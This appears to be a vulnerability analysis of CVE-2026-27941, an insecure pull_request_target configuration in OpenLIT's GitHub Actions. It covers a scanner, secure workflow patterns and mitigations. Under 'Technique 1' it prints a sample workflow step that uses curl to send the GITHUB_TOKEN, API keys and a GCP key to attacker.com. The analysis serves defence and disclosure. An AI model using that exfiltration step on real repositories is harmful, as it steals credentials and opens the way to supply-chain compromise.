CVE-2026-27941
Weakness (CWE)
CVSS v3.1 Vector
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: High
Description
OpenLIT is an open source platform for AI engineering. Prior to version 1.37.1, several GitHub Actions workflows in OpenLIT's GitHub repository use the `pull_request_target` event while checking out and executing untrusted code from forked pull requests. These workflows run with the security context of the base repository, including a write-privileged `GITHUB_TOKEN` and numerous sensitive secrets (API keys, database/vector store tokens, and a Google Cloud service account key). Version 1.37.1 contains a fix.
CVE-2026-27941: Comprehensive Technical Analysis
Executive Summary
CVE-2026-27941 represents a critical security vulnerability in OpenLIT's GitHub Actions CI/CD pipeline configuration, scoring 9.9 on the CVSS scale. This vulnerability stems from the insecure use of the pull_request_target event trigger combined with execution of untrusted code, creating a pathway for attackers to compromise the repository's security context and exfiltrate sensitive credentials.
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Classification
- Type: CI/CD Pipeline Injection / Privilege Escalation
- Category: Insecure Workflow Configuration (CWE-829: Inclusion of Functionality from Untrusted Control Sphere)
- CVSS Score: 9.9 (Critical)
Severity Justification
The 9.9 CVSS score is warranted due to:
High Impact Factors:
- Confidentiality Impact: CRITICAL - Direct access to multiple sensitive secrets including:
  - API keys for various services
  - Database credentials
  - Vector store authentication tokens
  - Google Cloud service account keys
- Integrity Impact: CRITICAL - Write access to the repository via the privileged GITHUB_TOKEN
- Availability Impact: HIGH - Potential for supply chain compromise affecting downstream users
Attack Complexity:
- Low Barrier to Entry: Requires only the ability to create a forked repository and submit a pull request
- No Special Privileges Required: any GitHub account able to fork the repository and open a pull request can trigger the vulnerable workflow
- No User Interaction: Automated workflow execution upon PR submission
Scope:
- Changed scope - affects resources beyond the vulnerable component (downstream users, integrated services)
2. Potential Attack Vectors and Exploitation Methods
Primary Attack Vector: Malicious Pull Request Injection
Attack Flow:
1. Attacker forks OpenLIT repository
2. Attacker modifies workflow files or code executed by workflows
3. Attacker submits pull request to upstream repository
4. GitHub Actions triggers pull_request_target workflow
5. Workflow executes with base repository context
6. Malicious code accesses GITHUB_TOKEN and secrets
7. Attacker exfiltrates credentials or modifies repository
Specific Exploitation Techniques
Technique 1: Direct Secret Exfiltration
    # Malicious workflow modification
    - name: Exfiltrate Secrets
      run: |
        curl -X POST https://attacker.com/collect \
          -d "token=${{ secrets.GITHUB_TOKEN }}" \
          -d "api_key=${{ secrets.API_KEY }}" \
          -d "gcp_key=${{ secrets.GCP_SERVICE_ACCOUNT }}"
Technique 2: Repository Poisoning
- Use the write-privileged GITHUB_TOKEN to:
  - Inject backdoors into the main branch
  - Modify release artifacts
  - Alter security policies
  - Create malicious releases
Technique 3: Supply Chain Attack
- Compromise build artifacts
- Inject malicious dependencies
- Modify container images
- Alter published packages
Technique 4: Lateral Movement
- Use exfiltrated GCP service account keys to access cloud infrastructure
- Leverage database credentials to compromise data stores
- Utilize API keys to access integrated third-party services
Technical Root Cause
The vulnerability exists because pull_request_target workflows:
- Run in the context of the base repository (not the fork)
- Have access to repository secrets
- Receive a write-privileged GITHUB_TOKEN
- Execute code from the head repository (the fork) when using actions/checkout@v2 with ref: ${{ github.event.pull_request.head.sha }}
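As an added example (not code from the advisory or from the OpenLIT project), the following Python scanner flags the root-cause pattern described above: a workflow triggered by pull_request_target that checks out the pull request head. The two workflow texts are constructed samples, not OpenLIT's real files; the second shows the label-gated, base-ref checkout that does not trigger a finding.

```python
import re

# Constructed sample workflows (not OpenLIT's files): the first shows the
# vulnerable pattern, the second a label-gated checkout of the base ref.
VULNERABLE_WORKFLOW = """\
name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: pip install -e . && pytest
"""

SAFE_WORKFLOW = """\
name: ci
on:
  pull_request_target:
    types: [labeled]
jobs:
  test:
    if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.base_ref }}
"""

TRIGGER_RE = re.compile(r"\bpull_request_target\b")
# Any reference to the PR head (sha, ref or repo) used to fetch the fork's code
HEAD_REF_RE = re.compile(r"github\.event\.pull_request\.head\.(sha|ref|repo)")


def find_pull_request_target_checkout(workflow_text):
    """Return [(line_no, line)] for lines that fetch the PR head inside a
    pull_request_target workflow; an empty list means the pattern is absent."""
    # Drop YAML comments so a commented-out trigger or ref does not count
    code_lines = [ln.split("#", 1)[0] for ln in workflow_text.splitlines()]
    if not any(TRIGGER_RE.search(ln) for ln in code_lines):
        return []
    return [(n, ln.strip()) for n, ln in enumerate(code_lines, 1)
            if HEAD_REF_RE.search(ln)]
```

Run it over every file under .github/workflows to find the workflows that need the secure patterns described in the mitigation section.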
3. Affected Systems and Software Versions
Affected Versions
- OpenLIT versions: All versions prior to 1.37.1
- Affected Component: GitHub Actions workflow configurations
Affected Workflows
Based on typical vulnerable patterns, likely affected workflows include:
- CI/CD testing workflows
- Build and deployment pipelines
- Code quality/linting workflows
- Documentation generation workflows
- Any workflow using the pull_request_target trigger
Infrastructure at Risk
- Primary: OpenLIT GitHub repository and CI/CD infrastructure
- Secondary:
- Google Cloud Platform resources (via service account compromise)
- Connected databases and vector stores
- Third-party services with exposed API keys
- Downstream users consuming OpenLIT packages
Dependency Chain Impact
Organizations using OpenLIT in their AI engineering pipelines face:
- Supply chain compromise risk
- Potential backdoored dependencies
- Compromised container images
- Malicious code injection in AI workflows
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1)
For OpenLIT Users:
- Upgrade Immediately: Update to version 1.37.1 or later
    # Verify current version
    pip show openlit
    # Upgrade to patched version (quote the specifier so the shell does not treat ">" as a redirection)
    pip install --upgrade "openlit>=1.37.1"
- Audit Existing Deployments: Check for signs of compromise
  - Review recent workflow runs for anomalous behavior
  - Audit repository commit history for unauthorized changes
  - Check for unexpected network connections in logs
- Rotate All Secrets: Assume compromise and rotate:
  - GitHub personal access tokens
  - API keys for integrated services
  - Database credentials
  - GCP service account keys
  - Any other secrets accessible to workflows
For Repository Maintainers:
- Implement Secure Workflow Patterns:
    # SECURE: Use pull_request for untrusted code
    on:
      pull_request:
        types: [opened, synchronize]

    # If pull_request_target is necessary:
    on:
      pull_request_target:
        types: [labeled]
    jobs:
      secure-job:
        # Only run after manual review
        if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
        runs-on: ubuntu-latest
        steps:
          # DO NOT checkout PR code in this context
          - uses: actions/checkout@v3
            with:
              ref: ${{ github.base_ref }}  # Checkout base, not PR
- Implement Workflow Isolation:
    # Separate workflows: one for untrusted code, one for secrets
    # Workflow 1: Run tests (no secrets)
    on: pull_request
    # Workflow 2: Deploy (with secrets, only on main)
    on:
      push:
        branches: [main]
Long-term Security Hardening (Priority 2)
- Implement Least Privilege:
  - Use fine-grained personal access tokens
  - Limit GITHUB_TOKEN permissions:
      permissions:
        contents: read
        pull-requests: read
  - Use environment-specific secrets with protection rules
- Enable Branch Protection:
  - Require code review for all PRs
  - Enable status checks
  - Restrict who can push to protected branches
  - Require signed commits
- Implement Security Scanning:
  - Use GitHub's secret scanning
  - Implement workflow security linters (e.g., actionlint)
  - Enable Dependabot alerts
  - Use SAST tools for workflow analysis
- Monitoring and Detection:
    # Add monitoring for suspicious activities
    - name: Audit Workflow Execution
      run: |
        # Log environment variables, excluding those whose name contains SECRET
        # (filtering by name does not reliably exclude secret values; rely on
        # GitHub's secret masking and keep secrets out of env where possible)
        env | grep -v SECRET | sort
        # Verify expected execution context
        echo "Actor: ${{ github.actor }}"
        echo "Repository: ${{ github.repository }}"
Use OpenID Connect (OIDC) for Cloud Access:
- Replace long-lived service account keys with OIDC tokens
- Implement short-lived, scoped credentials
- Reduce blast radius of credential compromise
Organizational Policies
- Establish Workflow Review Process:
- Mandatory security review for workflow changes
- Separate approval process for workflows with secrets